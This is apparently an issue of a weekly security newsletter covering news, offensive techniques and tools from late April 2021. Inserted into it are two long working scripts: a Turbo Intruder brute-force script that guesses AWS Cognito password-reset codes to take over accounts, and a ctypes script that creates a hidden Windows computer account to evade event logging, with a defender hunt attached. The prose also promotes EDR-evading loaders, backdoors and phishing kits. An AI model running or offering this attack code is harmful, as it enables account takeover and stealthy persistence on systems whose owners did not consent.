Policy change (@github), Marauder's map (@Jean_Maes_1994), Null byte injection in GoAhead (@luker983), in-mem DLL loader (@scythe_io), Firebase fronting (@shantanukhande), Source Engine client RCE (@4lpine), and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-26 to 2021-05-03.
News
- A call for feedback on our policies around exploits and malware. The Microsoft-owned GitHub has taken down a few exploits in the past (all against Microsoft products, I believe). While there are lots of hot takes on infosec Twitter about how this is the end of hosting exploits on GitHub, from my reading GitHub is being about as reasonable as a Microsoft-owned company can be at this stage. If we see projects being removed at a higher rate after this, perhaps those hot takes will be warranted. I find it somewhat ironic that git was built as a way to share code peer-to-peer (decentralized) and we as a community have turned to one centralized git host for nearly all our code.
- The IRS Wants Help Hacking Cryptocurrency Hardware Wallets. I find it interesting that the IRS is looking for a "repeatable, consistent" process to break hardware devices designed to store secrets and is launching Operation Hidden Treasure, while there are maybe other issues to focus on.
- Why Google Should Stop Logging Contact-Tracing Data. After all the cryptographic work to ensure contact-tracing apps would preserve privacy, Google goes and dumps all the temporary identifiers into logs readable by phone manufacturers and other "privileged" apps. Who would have thought that a massive surveillance system on every smartphone would be potentially abused (surprised-pikachu.jpg).
Techniques
- I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map. Jean-Francois makes good points about developing your own tools, or at least understanding the tools and scripts you use on a pentest. He has created an internal attack toolkit that can run C# binaries pulled from the internet. This is useful for constrained environments like Citrix desktops or other machines that allow little beyond MS Office, since you can run the binaries from Office macros.
- Discovering Null Byte Injection Vulnerability in GoAhead. This article goes to show that sometimes CTFs turn out real vulnerabilities!
- Overcoming Issues Using Custom Python Scripts with Burp Suite Professional. Burp Suite Professional is a great tool, and one of its best features is the ability to add your own! Using the Python Scripter extension, you can modify all requests, even those from the active scanner, to get better results against custom web applications.
- Password reset code brute-force vulnerability in AWS Cognito. Cognito does limit attempts on its 6-digit password reset codes, but the researchers used Turbo Intruder over many simultaneous TCP connections to get enough attempts through for a 0.32% chance of guessing a given user's reset code. Not bad if you have a big list of users.
- Linux Kernel /proc/pid/syscall information disclosure vulnerability. Not super useful on its own, but if you have a Linux bug that needs an information disclosure to defeat ASLR, this might be the missing piece.
- Firebase Domain Front - Hiding C2 as App traffic. While Azure has killed classic domain fronting, "function"-based fronts like this one should keep working, because running arbitrary code as a "function" is the service's core purpose; the redirector is just one more function.
- Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida. This very detailed post shows how Frida and x32dbg were used to achieve client RCE by modifying a Team Fortress 2 server to send malformed traffic to the clients that connect to it.
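For the Cognito item above, this is what a Turbo Intruder script for that brute force looks like. It is an added example, not the researchers' script: `RequestEngine` and `table` are injected by Turbo Intruder at runtime (Jython 2.7, hence no f-strings), the base request handed over from Burp is assumed to be a `ConfirmForgotPassword` call with `%s` in place of the `ConfirmationCode` value, and the connection counts are a guess. The `classify` helper is what turns Cognito's error types into something you can act on while the attack runs.

```python
# Added example for the Cognito brute force; not the researchers' own script.
# Turbo Intruder supplies RequestEngine and table when it loads this file.
import json

COGNITO_TARGET_HEADER = "AWSCognitoIdentityProviderService.ConfirmForgotPassword"


def confirm_body(client_id, username, code, new_password):
    """JSON body of a ConfirmForgotPassword call (Content-Type application/x-amz-json-1.1).

    This is the body the Burp request must carry, with the code replaced by %s
    before it is handed to Turbo Intruder.
    """
    return json.dumps({
        "ClientId": client_id,
        "Username": username,
        "ConfirmationCode": code,
        "Password": new_password,
    }, sort_keys=True)


def candidate_codes(start=0, count=1000000):
    """Zero-padded six-digit codes from `start`, in the order they are queued."""
    stop = min(start + count, 1000000)
    return ["%06d" % n for n in range(start, stop)]


def classify(status, body):
    """Bucket a Cognito reply as hit, miss, expired, throttled or other."""
    err = ""
    if body and body.strip():
        try:
            data = json.loads(body)
        except ValueError:
            return "other"          # not a Cognito JSON reply (proxy error, HTML, ...)
        if isinstance(data, dict):
            err = data.get("__type", "") or ""
    if status == 200 and not err:
        return "hit"                # code accepted: the password has been reset
    if err.endswith("CodeMismatchException"):
        return "miss"               # wrong code, but the attempt was accepted
    if err.endswith("ExpiredCodeException"):
        return "expired"            # code invalidated: this user's window is closed
    if err.endswith("LimitExceededException") or status == 429:
        return "throttled"          # the per-user limit caught this connection
    return "other"


def queueRequests(target, wordlists):
    # Many parallel TCP connections: the post used simultaneous connections to get
    # past the per-user attempt limit, which is what makes a 6-digit space reachable.
    # 50 x 100 is an assumed starting point, tune against what the service accepts.
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=50,
                           requestsPerConnection=100,
                           pipeline=False)
    for code in candidate_codes():
        engine.queue(target.req, code)      # target.req carries %s where the code goes


def handleResponse(req, interesting):
    # Misses are noise; everything else is a row: 'hit' is the reset, and
    # 'throttled'/'expired' tell you when the window closed and how far you got.
    if classify(req.status, req.response) != "miss":
        table.add(req)
```

Watch the `throttled` and `expired` rows: the ratio of misses to throttles per connection is the real measure of how much of the code space one user gives you, and an `expired` row means the remaining queued codes for that user are wasted traffic.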
Tools and Exploits
- DripLoader is an evasive shellcode loader aimed at bypassing event-based injection detection without necessarily suppressing event collection; it does use direct syscalls. By using "standard"-looking allocations and APIs, interleaved with delays, DripLoader makes it difficult for EDRs to flag the loading as malicious. It may be worth borrowing some of these techniques for your own custom loader.
- vaf is a "very advanced fuzzer" written in Nim. While not as fully featured as ffuf, I enjoy seeing more Nim projects.
- SharpNamedPipePTH is a C# version of the tool that uses Pass-the-Hash for authentication on a local named pipe for user impersonation. There is a blog post explaining the technique (covered in LWiS 2020-04-19).
- memory-module-loader is an implementation of a Windows loader that can load dynamic-link libraries (DLLs) directly from memory. The loader exposed by Windows itself only loads modules from disk, via LoadLibrary or LoadLibraryEx, but it is entirely possible to load a library from memory by doing the loader's work yourself (mapping sections, applying relocations, resolving imports). This is one such implementation, and it supports loading resources as well.
- MicroBackdoor is a C2 tool for Windows targets with an easily customizable codebase and a small footprint. Micro Backdoor consists of a server, client, and dropper. It wasn't designed as a replacement for your favorite post-exploitation tools but rather as a really minimalistic thing with all of the basic features in less than 5000 lines of code.
- DoUCMe leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting usri1_flags of the USER_INFO_1 structure to 0x1000 (UF_WORKSTATION_TRUST_ACCOUNT); usri1_priv has to stay USER_PRIV_USER or NetUserAdd rejects the call. The primary goal is to avoid the normal detection of new user created events (4720). This will hide the account from the Control Panel and the lusrmgr.msc snap-in. It will show up in the group listing, but not as a user. For defenders: computer-account creation is logged as 4741 rather than 4720 where computer-account auditing is enabled, and NetUserEnum with FILTER_WORKSTATION_TRUST_ACCOUNT lists exactly the accounts lusrmgr.msc hides.
- interactsh is an open-source solution for out-of-band data extraction: a tool designed to detect bugs that cause external interactions (blind SQLi, blind CMDi, SSRF, etc.). Interactsh is an alternative to Burp Collaborator with the potential to tie into other tools (e.g. nuclei).
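As an added example for the DoUCMe item above (not the project's own code), here is the same NetUserAdd call from Python/ctypes on Windows, followed by the check a defender or a cleanup step wants: NetUserEnum with FILTER_WORKSTATION_TRUST_ACCOUNT (0x10) enumerates the workstation trust accounts in the local SAM regardless of what lusrmgr.msc shows. The account name and password are placeholders, the structure and flag values are those documented for USER_INFO_1, and the `__main__` block needs an elevated prompt on Windows; the helpers above it run anywhere.

```python
# Added example, not DoUCMe's code: NetUserAdd with UF_WORKSTATION_TRUST_ACCOUNT,
# then a NetUserEnum hunt for such accounts. Windows only where netapi32 is called.
import ctypes

NERR_Success = 0
ERROR_MORE_DATA = 234
USER_PRIV_USER = 1                         # the only priv value NetUserAdd accepts
UF_SCRIPT = 0x0001                         # must be set on every account
UF_NORMAL_ACCOUNT = 0x0200                 # what an ordinary local user carries
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000      # what DoUCMe sets, in usri1_flags
FILTER_WORKSTATION_TRUST_ACCOUNT = 0x0010  # NetUserEnum filter for those accounts
MAX_PREFERRED_LENGTH = 0xFFFFFFFF


class USER_INFO_1(ctypes.Structure):
    _fields_ = [("usri1_name", ctypes.c_wchar_p),
                ("usri1_password", ctypes.c_wchar_p),
                ("usri1_password_age", ctypes.c_uint32),
                ("usri1_priv", ctypes.c_uint32),
                ("usri1_home_dir", ctypes.c_wchar_p),
                ("usri1_comment", ctypes.c_wchar_p),
                ("usri1_flags", ctypes.c_uint32),
                ("usri1_script_path", ctypes.c_wchar_p)]


def build_user_info(name, password, computer_account=True):
    """USER_INFO_1 for NetUserAdd; computer_account=False gives a normal user."""
    ui = USER_INFO_1()
    ui.usri1_name = name
    ui.usri1_password = password
    ui.usri1_priv = USER_PRIV_USER
    kind = UF_WORKSTATION_TRUST_ACCOUNT if computer_account else UF_NORMAL_ACCOUNT
    ui.usri1_flags = UF_SCRIPT | kind
    return ui


def is_trust_account(flags):
    """True for the accounts lusrmgr.msc hides but NetUserEnum(filter=0x10) lists."""
    return bool(flags & UF_WORKSTATION_TRUST_ACCOUNT)


def netapi32():
    """netapi32 with prototypes set; ctypes.WinDLL only exists on Windows."""
    api = ctypes.WinDLL("netapi32")
    u32, wstr = ctypes.c_uint32, ctypes.c_wchar_p
    api.NetUserAdd.argtypes = [wstr, u32, ctypes.POINTER(USER_INFO_1), ctypes.POINTER(u32)]
    api.NetUserAdd.restype = u32
    api.NetUserDel.argtypes = [wstr, wstr]
    api.NetUserDel.restype = u32
    api.NetUserEnum.argtypes = [wstr, u32, u32, ctypes.POINTER(ctypes.c_void_p), u32,
                                ctypes.POINTER(u32), ctypes.POINTER(u32), ctypes.POINTER(u32)]
    api.NetUserEnum.restype = u32
    api.NetApiBufferFree.argtypes = [ctypes.c_void_p]
    api.NetApiBufferFree.restype = u32
    return api


def add_account(name, password, computer_account=True, server=None):
    """Create the account; returns (status, parm_err) exactly as NetUserAdd reports them."""
    api = netapi32()
    ui = build_user_info(name, password, computer_account)
    parm_err = ctypes.c_uint32(0)
    status = api.NetUserAdd(server, 1, ctypes.byref(ui), ctypes.byref(parm_err))
    return status, parm_err.value


def list_trust_accounts(server=None):
    """Hunt: names of every workstation trust account in the (local) SAM."""
    api = netapi32()
    buf = ctypes.c_void_p()
    read, total, resume = ctypes.c_uint32(0), ctypes.c_uint32(0), ctypes.c_uint32(0)
    status = api.NetUserEnum(server, 0, FILTER_WORKSTATION_TRUST_ACCOUNT,
                             ctypes.byref(buf), MAX_PREFERRED_LENGTH,
                             ctypes.byref(read), ctypes.byref(total), ctypes.byref(resume))
    if status not in (NERR_Success, ERROR_MORE_DATA):
        raise OSError(status, "NetUserEnum failed")
    try:
        # level 0 returns an array of USER_INFO_0 { LPWSTR usri0_name }
        names = ctypes.cast(buf, ctypes.POINTER(ctypes.c_wchar_p))
        return [names[i] for i in range(read.value)]
    finally:
        if buf.value:
            api.NetApiBufferFree(buf)


if __name__ == "__main__":
    # Elevated prompt required. Name and password are placeholders, not DoUCMe defaults.
    name = "DoUCMeDemo$"
    status, bad_param = add_account(name, "Example-Passw0rd-2021!")
    print("NetUserAdd -> %d (parm_err %d)" % (status, bad_param))
    print("workstation trust accounts in SAM:", list_trust_accounts())
    print("NetUserDel -> %d" % netapi32().NetUserDel(None, name))
```

Run the enumeration on a box you suspect has been touched: a workstation trust account in the local SAM of a machine that is not a domain controller has no legitimate reason to exist, so any name coming back from `list_trust_accounts()` is worth a look, together with 4741 events where that audit subcategory is on.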
New to Me
This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!
- paragon is a red team engagement platform with the goal of unifying offensive tools behind a simple UI. This project looks really cool, and does a ton of the heavy lifting that everyone who has thought, "I'll write my own implant/C2", has run into. I'm surprised this hasn't gotten more press (or maybe I've just missed it?).
- SniperPhish is a phishing platform that has a few more features than everyone's favorite, Gophish, like an advanced web page builder to customize credential harvesting. I have yet to find a phishing platform that allows for "inbox management" (i.e. replying to emails via the web interface).
This post is cross-posted on SIXGEN's blog.